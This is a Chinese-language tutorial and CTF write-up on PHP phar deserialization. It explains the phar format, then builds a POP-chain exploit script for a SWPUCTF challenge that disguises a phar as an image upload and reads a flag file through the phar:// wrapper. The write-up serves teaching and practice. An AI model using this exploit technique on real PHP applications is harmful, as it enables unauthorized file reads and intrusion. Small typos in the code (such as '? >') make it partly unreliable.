淺析phar反序列化漏洞攻擊及實戰

前言

phar反序列化漏洞很久之前就開始接觸了；因為當時出了點問題導致一直無法成功，所以當時直接去學習其他的漏洞了；今天覺得是時候把這個漏洞補上去了；

漏洞成因

phar文件會以序列化的形式存儲用戶自定義的meta-data；該方法在文件系統函數（file_exists()、is_dir()等）參數可控的情況下，配合phar://偽協議，可以不依賴unserialize()直接進行反序列化操作

原理分析

phar的組成

通過查閱手冊發現phar由四部分組成；翻閱手冊可以知道，phar由四個部分組成，分別是`stub、manifest describing the contents、 the file contents、 [optional] a signature for verifying Phar integrity (phar file format only)` 下面進行解釋一下；

1 .0 a stub

標識作用，格式為xxx<?php xxx; __HALT_COMPILER();?>，前面任意，但是一定要以__HALT_COMPILER();?>結尾，否則php無法識別這是一個phar文件；

2 .0 a manifest describing the contents

其實可以理解為phar文件本質上是一中壓縮文件，其中包含有壓縮信息和權限，當然我們需要利用的序列化也在裡面；

圖片來源seebug

3 .0 the file contents

這裡指的是被壓縮文件的內容；

4 .0 [optional] a signature for verifying Phar integrity (phar file format only)

籤名，放在結尾；

試驗

這裡引用開心師傅給的一個實例；來進行生成；

```php

<?php

class TestObject {

}

@unlink("phar.phar");

$phar = new Phar("phar.phar"); //後綴名必須為phar

$phar->startBuffering();

$phar->setStub("<?php __HALT_COMPILER(); ?>"); //設置stub

$o = new TestObject();

$phar->setMetadata($o); //將自定義的meta-data存入manifest

$phar->addFromString("test.txt", "test"); //添加要壓縮的文件

//籤名自動計算

$phar->stopBuffering();

?>

```

然後在伺服器之下運行，發現成功生成phar文件；

然後打開這個phar文件，我們發現已經成功；並且數據的存儲方式是以序列化的方式存儲的；

那麼既然有序列化，那麼就一定有反序列化，php的很多文件系統函數在通過phar://偽協議解析phar文件的時候。都會將mate-data進行反序列化。

將phar偽造為其他類型的文件

前面在講的時候已經介紹了phar的四個部分，這裡注意到第一個部分stub；因為這個部分的存在，縱然我們修改了phar後綴，伺服器讀取到stub的時候依然會當作phar文件；再準確點講就是下面的代碼；(二進位的編譯器有點問題，簡單用記事本來看看；)也還是可以發現是以序列化形式存儲的；

實戰

拿一道 SWPUCTF 中的一道題目來講；進去就發現了包含漏洞，然後直接讀取源碼，發現並沒有對phar進行過濾；而且原始碼裡有提示，所以差不多實錘了，就是phar反序列化漏洞了；

直接來對關鍵的代碼進行分析；class.php

這裡面看到有三個類，再明顯不過了，這就是主要的pop鏈的構造處；然後發現了危險的函數 file_get_contents()；那看來就是利用這個讀源碼了；

一步步分析；先看到C1e4r這個類裡面有echo；那要利用echo；以達到輸出字符串的目的；

然後看到show類裡有一個 __toString()方法，這個方法在對象被轉化為字符串的時候會自動調用；比如進行echo print的時候會進行調用並返回一個字符串；

然後審計Test類，發現file_get_contents()函數，那就是利用了；一步一步向前追溯 file_get->get->__get()；這裡主要還是調用__get()方法；

那麼這裡思路差不多清晰了；簡單來講；在test類中要調用__get方法，那麼觸發這個方法我們需要在show類裡尋，因為這個類裡面運用了source屬性，所以只需要將 str['str'] 賦值為 Test類就可以，那麼觸發 __toString()方法就需要用到我們的第一個類裡面的echo了；

那麼思路清晰就構造處pop鏈；

exp編寫

<?php

class C1e4r

{

public $test;

public $str;

}

class Show

{

public $source;

public $str;

}

class Test

{

public $file;

public $params;

}

$c1e4r = new C1e4r();

$show = new Show();

$test = new Test();

$test->params['source'] = "/var/www/html/f1ag.php";

$c1e4r->str = $show;

$show->str['str'] = $test;

$phar = new Phar("exp.phar");

$phar->startBuffering();

$phar->setStub('<?php __HALT_COMPILER(); ? >');

$phar->setMetadata($c1e4r);

$phar->addFromString("exp.txt", "test");

$phar->stopBuffering();

?>

生成phar文件，改後綴為gif繞過限制，上傳之後進入upload目錄之下(或者根據原始碼算出上傳後的文件名),複製文件名到讀取文件的窗口讀取 file=phar://xxxxxx.jpg然後得到base64的編碼解碼就好。

合天網安實驗室--PHP安全特性之偽協議（通過該實驗了解php中的偽協議的應用及攻擊手段研究，能熟練使用burpsuite、中國菜刀等安全工具的使用。）